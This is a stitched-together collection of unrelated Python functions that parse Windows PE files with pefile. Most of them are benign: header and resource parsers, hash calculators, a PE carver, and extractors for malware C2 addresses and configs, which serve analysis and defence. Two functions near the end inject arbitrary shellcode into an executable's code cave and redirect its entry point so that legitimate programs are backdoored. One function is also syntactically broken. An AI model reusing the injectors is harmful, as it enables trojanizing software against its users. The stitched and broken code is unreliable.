def init_exports(self, pe: pefile.PE): if not Process.directory_exists(pe, 'IMAGE_DIRECTORY_ENTRY_EXPORT'): return # Do a full load if IMAGE_DIRECTORY_ENTRY_EXPORT is present so we can load the exports pe.full_load() iat = {} # parse directory entry export for entry in pe.DIRECTORY_ENTRY_EXPORT.symbols: ea = self.pe_image_address + entry.address self.export_symbols[ea] = { 'name': entry.name, 'ordinal': entry.ordinal } if entry.name: iat[entry.name] = ea iat[entry.ordinal] = ea dll_name = os.path.basename(self.path) self.import_address_table[dll_name.casefold()] = iat
def read(self): try: pe = PE(self.name, fast_load=True) except: print('File %s invalid' % self.name) return False if not pe.is_exe(): print('This file is not exe') pe.close() return False section = None for s in pe.sections: if s.Name == '.enigma1': section = s break if section is None: print('This file is not Enigma Virtual Box container') pe.close() return False self.data = pe.get_data(section.VirtualAddress, section.SizeOfRawData) pe.close() return True
def get_icon_group(pe_file: pefile.PE, data_entry: pefile.Structure) -> Optional[list]: try: data_rva = data_entry.OffsetToData size = data_entry.Size data = pe_file.get_memory_mapped_image()[data_rva:data_rva + size] file_offset = pe_file.get_offset_from_rva(data_rva) grp_icon_dir = pefile.Structure(GRPICONDIR_format, file_offset=file_offset) grp_icon_dir.__unpack__(data) if grp_icon_dir.Reserved == 0 or grp_icon_dir.Type == 1: offset = grp_icon_dir.sizeof() entries = list() for idx in range(0, grp_icon_dir.Count): grp_icon = pefile.Structure(GRPICONDIRENTRY_format, file_offset=file_offset + offset) grp_icon.__unpack__(data[offset:]) offset += grp_icon.sizeof() entries.append(grp_icon) return entries except pefile.PEFormatError: pass return None
def parse_file_info(cls, pe: PE) -> dict: """ Extracts a JSON-serializable and human readable dictionary with information about the version resource of an input PE file, if available. """ try: pe.parse_data_directories(directories=[ DIRECTORY_ENTRY['IMAGE_DIRECTORY_ENTRY_RESOURCE'] ]) FileInfoList = pe.FileInfo except AttributeError: return None for FileInfo in FileInfoList: for FileInfoEntry in FileInfo: with suppress(AttributeError): for StringTableEntry in FileInfoEntry.StringTable: StringTableEntryParsed = cls._parse_pedict( StringTableEntry.entries) with suppress(AttributeError): LangID = StringTableEntry.entries.get( 'LangID', None) or StringTableEntry.LangID LangID = int(LangID, 0x10) if not isinstance( LangID, int) else LangID LangHi = LangID >> 0x10 LangLo = LangID & 0xFFFF Language = cls._LCID.get(LangHi, 'Language Neutral') Charset = cls._CHARSET.get(LangLo, 'Unknown Charset') StringTableEntryParsed.update( LangID=F'{LangID:08X}', Charset=Charset, Language=Language) return StringTableEntryParsed
def get_bot_information(self, file_data): results = {} encrypted_section = file_data.rfind("\x44\x6d\x47\x00") if encrypted_section == -1: pe = PE(data=file_data) for x in range(len(pe.sections)): for s in data_strings(pe.get_data(pe.sections[x].VirtualAddress), 8, charset=ascii_uppercase + ascii_lowercase + digits + punctuation): if s.startswith("http://") and s != "http://": if "c2s" not in results: results["c2s"] = [] results["c2s"].append({"c2_uri": s}) else: encrypted_section += 4 encryption_key = None pe = PE(data=file_data) for s in data_strings(pe.get_data(pe.sections[3].VirtualAddress), 7): # the last string encryption_key = s if encryption_key is not None: rc4 = RC4(encryption_key) decrypted = "".join([chr(next(rc4) ^ ord(c)) for c in file_data[encrypted_section:]]) for s in data_strings(decrypted, 8, charset=ascii_uppercase + ascii_lowercase + digits + punctuation): if s.startswith("http://") and s != "http://": if "c2s" not in results: results["c2s"] = [] results["c2s"].append({"c2_uri": s}) return results
def pdb_guid(file): pe = PE(file, fast_load=True) pe.parse_data_directories() try: codeview = next( filter( lambda x: x.struct.Type == DEBUG_TYPE[ "IMAGE_DEBUG_TYPE_CODEVIEW"], pe.DIRECTORY_ENTRY_DEBUG, )) except StopIteration: print("Failed to find CodeView in pdb") raise RuntimeError("Failed to find GUID age") offset = codeview.struct.PointerToRawData size = codeview.struct.SizeOfData tmp = CV_RSDS_HEADER.parse(pe.__data__[offset:offset + size]) guidstr = "%08x%04x%04x%s%x" % ( tmp.GUID.Data1, tmp.GUID.Data2, tmp.GUID.Data3, hexlify(tmp.GUID.Data4).decode("ascii"), tmp.Age, ) return {"filename": tmp.Filename, "GUID": guidstr}
def getPE(file): if (PE(file) == True): PEFileInstance = PE(file, data='module.dll') yeet = PEFileInstance.dump_info().strip().split('\n') pedata = [] keys = [ 'SizeOfOptionalHeader', 'Characteristics', 'MajorLinkerVersion', 'MinorLinkerVersion', 'SizeOfCode', 'SizeOfInitializedData', 'SizeOfUninitializedData', 'AddressOfEntryPoint', 'BaseOfCode', 'BaseOfData', 'ImageBase', 'SectionAlignment', 'FileAlignment', 'MajorOperatingSystemVersion', 'MinorOperatingSystemVersion', 'MajorImageVersion', 'MinorImageVersion', 'MajorSubsystemVersion', 'MinorSubsystemVersion', 'SizeOfImage', 'SizeOfHeaders', 'CheckSum', 'Subsystem', 'DllCharacteristics', 'SizeOfStackReserve', 'SizeOfStackCommit', 'SizeOfHeapReserve', 'SizeOfHeapCommit', 'LoaderFlags', 'NumberOfRvaAndSizes', 'SectionsMeanVirtualsize', 'SectionsMinVirtualsize', 'SectionMaxVirtualsize' ] for key in keys: for x in range(len(yeet)): if (yeet[x].find(key) != -1): pedata.append(int(str(yeet[x][48:].strip()), 16)) break print(pedata)
def parse_fileinfo(pe: pefile.PE): if has_resources(pe): filevers = find_resources(pe, resourceid( 16, 1, None), read_data=False) # RT_VERSION, always 1?, any lang for filever in filevers: pe.parse_version_information(filever.struct) return has_fileinfo(pe)
def process(self, data): pe = PE(data=data, fast_load=True) pe.parse_data_directories(directories=[IMAGE_DIRECTORY_ENTRY_IMPORT]) th = pe.get_imphash() if not th: raise ValueError('no import directory.') return th.encode(self.codec) if self.args.text else bytes.fromhex(th)
def fileversion(pename): pe = PE(pename) verinfo = pe.VS_FIXEDFILEINFO[0] filever = (verinfo.FileVersionMS >> 16, verinfo.FileVersionMS & 0xFFFF, verinfo.FileVersionLS >> 16, verinfo.FileVersionLS & 0xFFFF) pe.close() return "%d.%d.%d.%d" % filever
def __init__(self, path): self.path = path self.type = 'PE' self.parser = PE(path, fast_load=True) self.parser.parse_data_directories() self.imageBase = self.parser.OPTIONAL_HEADER.ImageBase self.entryPoint = self.parser.OPTIONAL_HEADER.AddressOfEntryPoint self.sections = [] self.stringAddrs = [] self.strings = self.strings() for section in self.parser.sections: s = Section(section.Name.decode().replace('\x00', ''), section.VirtualAddress + self.imageBase, section.Misc_VirtualSize) self.sections.append(s) self.imports = [] for entry in self.parser.DIRECTORY_ENTRY_IMPORT: for imp in entry.imports: importFunc = ImportFunction(imp.name.decode(), imp.address, entry.dll.decode()) self.imports.append(importFunc) self.exports = [] if hasattr(self.parser, "DIRECTORY_ENTRY_EXPORT"): for exp in self.parser.DIRECTORY_ENTRY_EXPORT.symbols: exportFunc = ExportFunction(self.imageBase + exp.address, exp.name.decode()) self.exports.append(exportFunc) self.findStrings()
def _algorithm(self, data): pe = PE(data=data, fast_load=True) pe.parse_data_directories(directories=[IMAGE_DIRECTORY_ENTRY_IMPORT]) th = pe.get_imphash() if not th: raise ValueError('no import directory.') return bytes.fromhex(th)
def _add_pe_info(self): parsed_pe = PE(data=self._content) self._add_vs_info(parsed_pe) self._add_file_property('pe', 'imphash', parsed_pe.get_imphash()) self._add_file_property( 'pe', 'compilation', datetime.utcfromtimestamp( parsed_pe.FILE_HEADER.TimeDateStamp).isoformat())
def __determine_file_extension(parsed_pe_file: pefile.PE) -> str: if parsed_pe_file.is_dll(): return 'dll' if parsed_pe_file.is_driver(): return 'sys' if parsed_pe_file.is_exe(): return 'exe' else: return 'bin'
def parse_time_stamps(cls, pe: PE, raw_time_stamps: bool) -> dict: """ Extracts time stamps from the PE header (link time), as well as from the imports, exports, debug, and resource directory. The resource time stamp is also parsed as a DOS time stamp and returned as the "Delphi" time stamp. """ if raw_time_stamps: def dt(ts): return ts else: def dt(ts): # parse as UTC but then forget time zone information return datetime.fromtimestamp( ts, tz=timezone.utc).replace(tzinfo=None) pe.parse_data_directories(directories=[ DIRECTORY_ENTRY['IMAGE_DIRECTORY_ENTRY_IMPORT'], DIRECTORY_ENTRY['IMAGE_DIRECTORY_ENTRY_EXPORT'], DIRECTORY_ENTRY['IMAGE_DIRECTORY_ENTRY_DEBUG'], DIRECTORY_ENTRY['IMAGE_DIRECTORY_ENTRY_RESOURCE'] ]) info = {} with suppress(AttributeError): info.update(Linker=dt(pe.FILE_HEADER.TimeDateStamp)) with suppress(AttributeError): for entry in pe.DIRECTORY_ENTRY_IMPORT: info.update(Import=dt(entry.TimeDateStamp())) with suppress(AttributeError): for entry in pe.DIRECTORY_ENTRY_DEBUG: info.update(DbgDir=dt(entry.struct.TimeDateStamp)) with suppress(AttributeError): Export = pe.DIRECTORY_ENTRY_EXPORT.struct.TimeDateStamp if Export: info.update(Export=dt(Export)) with suppress(AttributeError): res_timestamp = pe.DIRECTORY_ENTRY_RESOURCE.struct.TimeDateStamp if res_timestamp: with suppress(ValueError): from ...misc.datefix import datefix dos = datefix.dostime(res_timestamp) info.update(Delphi=dos) info.update(RsrcTS=dt(res_timestamp)) def norm(value): if isinstance(value, int): return value return str(value) return {key: norm(value) for key, value in info.items()}
def unpack(self, data): cursor = 0 mv = memoryview(data) while True: offset = data.find(B'MZ', cursor) if offset < cursor: break cursor = offset + 2 ntoffset = mv[offset + 0x3C:offset + 0x3E] if len(ntoffset) < 2: return ntoffset, = unpack('H', ntoffset) if mv[offset + ntoffset:offset + ntoffset + 2] != B'PE': self.log_debug( F'invalid NT header signature for candidate at 0x{offset:08X}' ) continue try: pe = PE(data=data[offset:], fast_load=True) except PEFormatError as err: self.log_debug( F'parsing of PE header at 0x{offset:08X} failed:', err) continue pesize = get_pe_size(pe, memdump=self.args.memdump) pedata = mv[offset:offset + pesize] info = {} if self.args.fileinfo: try: info = pemeta().parse_version(pe) or {} except Exception as error: self.log_warn( F'Unable to obtain file information: {error!s}') try: path = info['OriginalFilename'] except KeyError: extension = 'exe' if pe.is_exe() else 'dll' if pe.is_dll( ) else 'sys' path = F'carve-0x{offset:08X}.{extension}' if offset > 0 or self.args.keep_root: yield UnpackResult(path, pedata, offset=offset) self.log_info( F'extracted PE file of size 0x{pesize:08X} from 0x{offset:08X}' ) else: self.log_info( F'ignored root file of size 0x{pesize:08X} from 0x{offset:08X}' ) continue if not offset or self.args.recursive: cursor += pe.OPTIONAL_HEADER.SizeOfHeaders else: cursor += pesize
def parse_pe_fetch_pdb(symbol_server, file_path): ''' Attempt to fetch a symbol that relates to a PE file. The file must have a valid IMAGE_DEBUG_DIRECTORY and as well as a IMAGE_DEBUG_TYPE_CODEVIEW directroy entry. ''' try: guid = None pdb_filename = None pe = PE(file_path, fast_load=True) pe.parse_data_directories(directories=[DIRECTORY_ENTRY['IMAGE_DIRECTORY_ENTRY_DEBUG']]) code_view_entry = None for debug_entry in pe.DIRECTORY_ENTRY_DEBUG: if DEBUG_TYPE[debug_entry.struct.Type] == "IMAGE_DEBUG_TYPE_CODEVIEW": code_view_entry = debug_entry break if code_view_entry == None: logger.warn("%s doesn't have symbol information", basename(file_path)) return None, None symbol_type_offset = code_view_entry.struct.PointerToRawData symbol_type_size = code_view_entry.struct.SizeOfData symbol_type_data = pe.__data__[symbol_type_offset:symbol_type_offset+symbol_type_size] if symbol_type_data[:4] == "RSDS": rsds = CV_RSDS_HEADER.parse(symbol_type_data) guid = "%08x%04x%04x%s%x" % (rsds.GUID.Data1, rsds.GUID.Data2, rsds.GUID.Data3, rsds.GUID.Data4.encode('hex'), rsds.Age) pdb_filename = ntbasename(rsds.Filename) elif symbol_type_data[:4] == "NB10": nb10 = CV_NB10_HEADER.parse(symbol_type_data) guid = "%x%x" % (nb10.Timestamp, nb10.Age) pdb_filename = ntbasename(nb10.Filename) else: logger.error("%s unsupported symbol type", symbol_type_data[:4]) return None, None assert guid assert pdb_filename symbol = __fetch__(symbol_server, guid, file_path, pdb_filename) if symbol[:4] == 'MSCF': # TODO, unpack cabinet else: logger.error("Excpected symbol server to return a cabinet file") return None, None return symbol, basename(pdb_filename) except Exception: logger.error(format_exc()) return None, None
def __init__(self, libpath): self.libpath = libpath self.pe = PE(libpath) last_section = self.pe.sections[-1] # In case of uninitialized data at the end of section # Not needed now, so not implemented assert last_section.Misc_VirtualSize <= last_section.SizeOfRawData self.last_section = last_section # Set RWX self.last_section.IMAGE_SCN_MEM_WRITE = True self.last_section.IMAGE_SCN_MEM_EXECUTE = True # Move from mmap to str self.pe.__data__ = self.pe.__data__.read(self.pe.__data__.size())
class PEDebugData(object): def __init__(self, path, filename=None): self.pe = PE(path, fast_load=True) self.path = path self.filename = filename if filename is None: self.filename = os.path.basename(path) @property def symbol_id(self): return self.codeview_info().symbol_id @property def executable_id(self): retval = None if self.filename is not None: retval = '%s/%X%X' % (self.filename.lower(), self.pe.FILE_HEADER.TimeDateStamp, self.pe.OPTIONAL_HEADER.SizeOfImage) return retval def codeview_info(self): info = None data = self.debug_data() if data is not None: if data[:4] == 'RSDS': info = CodeViewRSDS(data) elif data[:4] == 'NB10': info = CodeViewNB10(data) else: raise PEUnknownDebugDataError('Unknown CodeView type: %s' % data[:4]) else: raise PEMissingDebugDataError() return info def debug_data(self): data = None if not hasattr(self.pe, 'DIRECTORY_ENTRY_DEBUG'): self.pe.parse_data_directories( DIRECTORY_ENTRY['IMAGE_DIRECTORY_ENTRY_DEBUG'] ) if hasattr(self.pe, 'DIRECTORY_ENTRY_DEBUG'): for entry in self.pe.DIRECTORY_ENTRY_DEBUG: off = entry.struct.PointerToRawData if (entry.struct.Type == DEBUG_TYPE['IMAGE_DEBUG_TYPE_CODEVIEW'] or entry.struct.Type == DEBUG_TYPE['IMAGE_DEBUG_TYPE_MISC']): data = self.pe.__data__[off:off+entry.struct.SizeOfData] if data is not None: break return data
def map_and_load(self, path, execute_now=False): ql = self.ql pe = PE(path, fast_load=True) # Make sure no module will occupy the NULL page if self.next_image_base > pe.OPTIONAL_HEADER.ImageBase: IMAGE_BASE = self.next_image_base pe.relocate_image(IMAGE_BASE) else: IMAGE_BASE = pe.OPTIONAL_HEADER.ImageBase IMAGE_SIZE = ql.mem.align(pe.OPTIONAL_HEADER.SizeOfImage, 0x1000) while IMAGE_BASE + IMAGE_SIZE < self.heap_base_address: if not ql.mem.is_mapped(IMAGE_BASE, 1): self.next_image_base = IMAGE_BASE + 0x10000 ql.mem.map(IMAGE_BASE, IMAGE_SIZE) pe.parse_data_directories() data = bytearray(pe.get_memory_mapped_image()) ql.mem.write(IMAGE_BASE, bytes(data)) logging.info("[+] Loading %s to 0x%x" % (path, IMAGE_BASE)) entry_point = IMAGE_BASE + pe.OPTIONAL_HEADER.AddressOfEntryPoint if self.entry_point == 0: # Setting entry point to the first loaded module entry point, so the debugger can break. self.entry_point = entry_point logging.info("[+] PE entry point at 0x%x" % entry_point) self.install_loaded_image_protocol(IMAGE_BASE, IMAGE_SIZE) self.images.append( self.coverage_image( IMAGE_BASE, IMAGE_BASE + pe.NT_HEADERS.OPTIONAL_HEADER.SizeOfImage, path)) if execute_now: logging.info( f'[+] Running from 0x{entry_point:x} of {path}') assembler = self.ql.create_assembler() code = f""" mov rcx, {IMAGE_BASE} mov rdx, {self.gST} mov rax, {entry_point} call rax """ runcode, _ = assembler.asm(code) ptr = ql.os.heap.alloc(len(runcode)) ql.mem.write(ptr, bytes(runcode)) ql.os.exec_arbitrary(ptr, ptr + len(runcode)) else: self.modules.append((path, IMAGE_BASE, entry_point, pe)) return True else: IMAGE_BASE += 0x10000 pe.relocate_image(IMAGE_BASE) return False
def hash_module(imm, module_name): """Calculate an MD5 hash of each section in a given module. The results are displayed in the log window. Args: imm: Immunity debugger object module_name: Name of the module to hash Returns: String describing the success/failure of the operation """ if module_name.split('.')[-1] not in ('exe', 'sys', 'dll'): module_name = '%s.dll' % module_name module = imm.getModule(module_name) if not module: return '%s is not a loaded module' % module_name pe = PE(name=module.getPath()) for section in pe.sections: section_name = section.Name.split('\x00')[0] start = module.getBaseAddress() + section.VirtualAddress virtual_size = section.Misc_VirtualSize alignment = pe.OPTIONAL_HEADER.SectionAlignment size = virtual_size + (alignment - virtual_size % alignment) data = imm.readMemory(start, size) md5sum = md5(data).hexdigest() imm.log('%s %s MD5: %s' % (module.name, section_name, md5sum)) return 'Calculated hash for %s' % module.name
def get_pe_size(pe: Union[PE, ByteString], overlay=True, sections=True, directories=True, cert=True) -> int: """ This fuction determines the size of a PE file, optionally taking into account the pefile module overlay computation, section information, data directory information, and certificate entries. """ if not isinstance(pe, PE): pe = PE(data=pe, fast_load=True) overlay_value = overlay and pe.get_overlay_data_start_offset() or 0 sections_value = sections and max(s.PointerToRawData + s.SizeOfRawData for s in pe.sections) or 0 directories_value = directories and max( pe.get_offset_from_rva(d.VirtualAddress) + d.Size for d in pe.OPTIONAL_HEADER.DATA_DIRECTORY) or 0 if cert: # The certificate overlay is given as a file offset # rather than a virtual address. cert_entry = pe.OPTIONAL_HEADER.DATA_DIRECTORY[ IMAGE_DIRECTORY_ENTRY_SECURITY] cert_value = cert_entry.VirtualAddress + cert_entry.Size else: cert_value = 0 return max(overlay_value, sections_value, directories_value, cert_value)
def get_pe_info(target): row = [0] * (len(DLL_API_FEATURES) + len(SECTION_NAMES)) try: pe = PE(target) except PEFormatError: # log.exception("%s, not valid PE File" % target) return None if hasattr(pe, "DIRECTORY_ENTRY_IMPORT"): for entry in pe.DIRECTORY_ENTRY_IMPORT: dll = norm_str(entry.dll) if dll in DLL_API_FEATURES: index = DLL_API_FEATURES.index(dll) row[index] = 1 for imp in entry.imports: api = norm_str(imp.name) if api in DLL_API_FEATURES: index = DLL_API_FEATURES.index(api) row[index] = 1 else: return None for section in pe.sections: se = norm_str(section.Name) if se in SECTION_NAMES: index = SECTION_NAMES.index(se) row[index + len(DLL_API_FEATURES)] = 1 else: row[-1] += 1 # change list to string return ",".join(map(str, row))
def process(self, data: bytearray) -> bytearray: pe = PE(data=data, fast_load=True) pe.parse_data_directories(directories=[self._SECDIRID]) security = pe.OPTIONAL_HEADER.DATA_DIRECTORY[self._SECDIRID] sgnoff = security.VirtualAddress + 8 sgnend = sgnoff + security.Size length, revision, certtype = unpack('<IHH', data[sgnoff - 8:sgnoff]) signature = data[sgnoff:sgnend] if len(signature) + 8 != length: raise RefineryPartialResult( F'Found {len(signature) + 8} bytes of signature, but length should be {length}.', partial=signature) return signature
def initialize(self): self.file_handle = open(self.wow_binary, 'rb') self.handle = mmap.mmap(self.file_handle.fileno(), 0, access=mmap.ACCESS_READ) self.pe = PE(data=self.handle, fast_load=True) logging.info('{} ImageBase={:#016x}'.format( self.wow_binary, self.pe.OPTIONAL_HEADER.ImageBase)) self.image_base = self.pe.OPTIONAL_HEADER.ImageBase for section in self.pe.sections: if b'.rdata' in section.Name: self.rdata_start = section.PointerToRawData self.rdata_end = self.rdata_start + section.SizeOfRawData self.rdata_voffset = section.VirtualAddress logging.info( ('{} .rdata found at PhysicalAddress={:#08x} ' 'VirtualAddress={:#08x}').format(self.wow_binary, self.rdata_start, self.rdata_voffset)) return True
def _extract_messagetable(dll: pefile.PE, locale_id: LocaleID) -> Mapping[int, str]: mmap = dll.get_memory_mapped_image() entries = dll.DIRECTORY_ENTRY_RESOURCE.entries offset, size = _traverse_resources(entries, (RT_MESSAGETABLE, 1, locale_id.value)) data = mmap[offset : offset + size] return dict(_read_messagetable_resource(data))
def get_pe(self, force=False): """ Returns the pefile.PE object if the file is actually a PE Args: force: Disable extension detection for PE files (default False) Returns: pefile.PE None """ if not PEFILE_SUPPORT: return None if force or self.__attrs['path'].suffix in ['.dll', '.exe', '.sys']: try: data = self.get_data() self.pe_data = PE(name=str(self.__attrs['path']), data=data, fast_load=True) return self.pe_data except PEFormatError: return None except Exception: return None return None
def dump_image(uc, base_addr, virtualmemorysize, path="unpacked.exe"): print(f"Dumping state to {path}") loaded_img = uc.mem_read(base_addr, virtualmemorysize + 0x3000) pe = PE(data=loaded_img) header_size = align(len(pe.header)) pe.sections[0].PointerToRawData = header_size # make the section 2GiB ... pefile truncates to actual max size of data pe.sections[0].SizeOfRawData = 0x80000000 pe.sections[0].Misc_VirtualSize = len(pe.sections[0].get_data()) for section in pe.sections[1:]: section.SizeOfRawData = 0 section.Misc_VirtualSize = 0 pe.write(path)
def get_version(data): pe = PE(data=data) info = pe.VS_FIXEDFILEINFO[0] return '.'.join( map(str, [ info.FileVersionMS >> 16, info.FileVersionMS & 0xFFFF, info.FileVersionLS >> 16, info.FileVersionLS & 0xFFFF ]))
def _pesize(self, pe: PE) -> int: overlay = pe.get_overlay_data_start_offset() or 0 maxaddr = max(s.PointerToRawData + s.SizeOfRawData for s in pe.sections) maxdata = max( pe.get_offset_from_rva(d.VirtualAddress) + d.Size for d in pe.OPTIONAL_HEADER.DATA_DIRECTORY) # The certificate overlay is given as a file offset # rather than a virtual address. cert = pe.OPTIONAL_HEADER.DATA_DIRECTORY[ DIRECTORY_ENTRY['IMAGE_DIRECTORY_ENTRY_SECURITY']] certend = cert.VirtualAddress + cert.Size self.log_debug(F'overlay at 0x{overlay:08X}') self.log_debug(F'maxaddr at 0x{maxaddr:08X}') self.log_debug(F'maxdata at 0x{maxdata:08X}') self.log_debug(F'certend at 0x{certend:08X}') return max(overlay, maxaddr, maxdata, certend)
def restore_pe(file): from pefile import PE pe = PE(file,fast_load=True) # Helpers find_section = lambda name:next(filter(lambda x:name in x.Name,pe.sections)) find_data_directory = lambda name:next(filter(lambda x:name in x.name,pe.OPTIONAL_HEADER.DATA_DIRECTORY)) # Remove .enigma sections pe.__data__ = pe.__data__[:find_section(b'.enigma1').PointerToRawData] pe.FILE_HEADER.NumberOfSections -= 2 # Restore rdata & idata sections find_data_directory('TLS').VirtualAddress = find_section(b'.rdata').VirtualAddress find_data_directory('ENTRY_IMPORT').VirtualAddress = find_section(b'.idata').VirtualAddress # Write to new file pe_name = os.path.basename(file)[:-4] + ORIGINAL_PE_SUFFIX pe_name = os.path.join(output,pe_name).replace('\\','/') pe.write(pe_name) print('[-] Original PE saved:',pe_name)
def configExtract(rawData): pe = PE(data=rawData) try: rt_string_idx = [ entry.id for entry in pe.DIRECTORY_ENTRY_RESOURCE.entries].index(RESOURCE_TYPE['RT_RCDATA']) except ValueError as e: return None except AttributeError as e: return None rt_string_directory = pe.DIRECTORY_ENTRY_RESOURCE.entries[rt_string_idx] for entry in rt_string_directory.directory.entries: if str(entry.name) == "CFG": data_rva = entry.directory.entries[0].data.struct.OffsetToData size = entry.directory.entries[0].data.struct.Size data = pe.get_memory_mapped_image()[data_rva:data_rva + size] return data
def get_bot_information(self, file_data): results = {} gate = None server = None pe = PE(data=file_data) for x in range(len(pe.sections)): for s in data_strings(pe.get_data(pe.sections[x].VirtualAddress)): if s.find(".php") != -1: if s[0] != "/": s = "/" + s if gate is None: gate = set() gate.add(s) if is_ip_or_domain(s): if server is None: server = set() server.add(s) if server is not None and gate is not None: results["c2s"] = [] for ip in server: for p in gate: uri = "%s%s" % (ip, p) results["c2s"].append({"c2_uri": uri}) return results
def config_extract(raw_data): try: pe = PE(data=raw_data) try: rt_string_idx = [ entry.id for entry in pe.DIRECTORY_ENTRY_RESOURCE.entries].index(RESOURCE_TYPE['RT_RCDATA']) except ValueError: return None except AttributeError: return None rt_string_directory = pe.DIRECTORY_ENTRY_RESOURCE.entries[rt_string_idx] for entry in rt_string_directory.directory.entries: if str(entry.name) == "XX-XX-XX-XX" or str(entry.name) == "CG-CG-CG-CG": data_rva = entry.directory.entries[0].data.struct.OffsetToData size = entry.directory.entries[0].data.struct.Size data = pe.get_memory_mapped_image()[data_rva:data_rva + size] config = data.split('####@####') return config except: return None
def main( exe_file, shellcode): if not (os.path.isfile( exe_file)): print("\nExecutable file cant detected ! \n Please try with full path.\n") return False shellcode = shellcode.replace("\\x", "").decode("hex") pe = PE(exe_file) OEP = pe.OPTIONAL_HEADER.AddressOfEntryPoint pe_sections = pe.get_section_by_rva(pe.OPTIONAL_HEADER.AddressOfEntryPoint) align = pe.OPTIONAL_HEADER.SectionAlignment what_left = (pe_sections.VirtualAddress + pe_sections.Misc_VirtualSize) - pe.OPTIONAL_HEADER.AddressOfEntryPoint end_rva = pe.OPTIONAL_HEADER.AddressOfEntryPoint + what_left padd = align - (end_rva % align) e_offset = pe.get_offset_from_rva(end_rva+padd) - 1 scode_size = len(shellcode)+7 if padd < scode_size: print("\nEnough space is not available for shellcode") print("Available codecave len : {0} \n").format( covecavelenght( pe)) return False else: scode_end_off = e_offset scode_start_off = scode_end_off - scode_size pe.OPTIONAL_HEADER.AddressOfEntryPoint = pe.get_rva_from_offset(scode_start_off) raw_pe_data = pe.write() jmp_to = OEP - pe.get_rva_from_offset(scode_end_off) shellcode = '\x60%s\x61\xe9%s' % (shellcode, pack('I', jmp_to & 0xffffffff)) final_data = list(raw_pe_data) final_data[scode_start_off:scode_start_off+len(shellcode)] = shellcode final_data = ''.join(final_data) raw_pe_data = final_data pe.close() while True: final_pe_file = "{0}".format(str(randint(0, 999999999))) if not os.path.isfile(final_pe_file): break new_file = open(final_pe_file, 'wb') new_file.write(raw_pe_data) new_file.close() print ("\nNew file : {0} saved !").format( final_pe_file) print ('[*] Job Done! :)')
def injectPE(filename, shellcode, output_file): pe = PE(filename) original_entry_point = pe.OPTIONAL_HEADER.AddressOfEntryPoint (end_offset, end_offset_aligned, padding, permissions) = getEPDetails(pe) # check permissions print '[*] Permissions for entry point\'s section :', permissions.items() if permissions['exec'] == False: print '[!] Entry point is not executable! Wtf? Exiting!' exit(1) # check for enough padding to fit the payload print '[*] Found %d bytes of padding' % padding sc_size = len(shellcode)+7 # +1 pusha, +1 popa, +5 rel32 jmp if padding < sc_size: print '[!] Not enough padding to insert shellcode :(' exit(1) else: print ' [+] There is enough room for the shellcode!' print ' [+] start_va = 0x%08x, end_va = 0x%08x' % (pe.OPTIONAL_HEADER.ImageBase+pe.get_rva_from_offset(end_offset), pe.OPTIONAL_HEADER.ImageBase+pe.get_rva_from_offset(end_offset_aligned)) print ' [+] start_offset = 0x%x, end_offset = 0x%x' % (end_offset, end_offset_aligned) # use the right-most bytes available sc_end_offset = end_offset_aligned sc_start_offset = sc_end_offset - sc_size print '[*] Placing the payload at :' print ' [+] start_va = 0x%08x, end_va = 0x%08x' % (pe.OPTIONAL_HEADER.ImageBase+pe.get_rva_from_offset(sc_start_offset), pe.OPTIONAL_HEADER.ImageBase+pe.get_rva_from_offset(sc_end_offset)) print ' [+] start_offset = 0x%x, end_offset = 0x%x' % (sc_start_offset, sc_end_offset) # change the entry point changeEntryPoint(pe, pe.get_rva_from_offset(sc_start_offset)) raw_data = pe.write() jmp_distance = original_entry_point - pe.get_rva_from_offset(sc_end_offset) # fix the shellcode to save register contents and jmp to original entry after completion shellcode = fixShellcode(shellcode, jmp_distance) raw_data = insertShellcode(raw_data, sc_start_offset, shellcode) # write the new file pe.close() # close the 'opened' PE first new_file = open(output_file, 'wb') new_file.write(raw_data) new_file.close() print '[*] New file created :)'
def pehashng(pe_file): """ Return pehashng for PE file, sha256 of PE structural properties. :param pe_file: file name or instance of pefile.PE() class :return: SHA256 in hexdigest format, None in case of pefile.PE() error :rtype: str """ if isinstance(pe_file, PE): exe = pe_file else: try: exe = PE(pe_file, fast_load=True) except PEFormatError as exc: logging.error("Exception in pefile.PE('%s') - %s", pe_file, exc) return def align_down_p2(number): return 1 << (number.bit_length() - 1) if number else 0 def align_up(number, boundary_p2): assert not boundary_p2 & (boundary_p2 - 1), "Boundary '%d' is not a power of 2" % boundary_p2 boundary_p2 -= 1 return (number + boundary_p2) & ~boundary_p2 def get_dirs_status(): dirs_status = 0 for idx in range(min(exe.OPTIONAL_HEADER.NumberOfRvaAndSizes, 16)): if exe.OPTIONAL_HEADER.DATA_DIRECTORY[idx].VirtualAddress: dirs_status |= 1 << idx return dirs_status def get_complexity(): complexity = 0 if section.SizeOfRawData: complexity = len(compress(section.get_data())) * 7.0 / section.SizeOfRawData complexity = 8 if complexity > 7 else int(round(complexity)) return complexity characteristics_mask = 0b0111111100100011 data_directory_mask = 0b0111111001111111 data = [ pack("> H", exe.FILE_HEADER.Characteristics & characteristics_mask), pack("> H", exe.OPTIONAL_HEADER.Subsystem), pack("> I", align_down_p2(exe.OPTIONAL_HEADER.SectionAlignment)), pack("> I", align_down_p2(exe.OPTIONAL_HEADER.FileAlignment)), pack("> Q", align_up(exe.OPTIONAL_HEADER.SizeOfStackCommit, 4096)), pack("> Q", align_up(exe.OPTIONAL_HEADER.SizeOfHeapCommit, 4096)), pack("> H", get_dirs_status() & data_directory_mask), ] for section in exe.sections: data += [ pack("> I", align_up(section.VirtualAddress, 512)), pack("> I", align_up(section.SizeOfRawData, 512)), pack("> B", section.Characteristics >> 24), pack("> B", get_complexity()), ] if not isinstance(pe_file, PE): exe.close() data_sha256 = sha256(b"".join(data)).hexdigest() return data_sha256
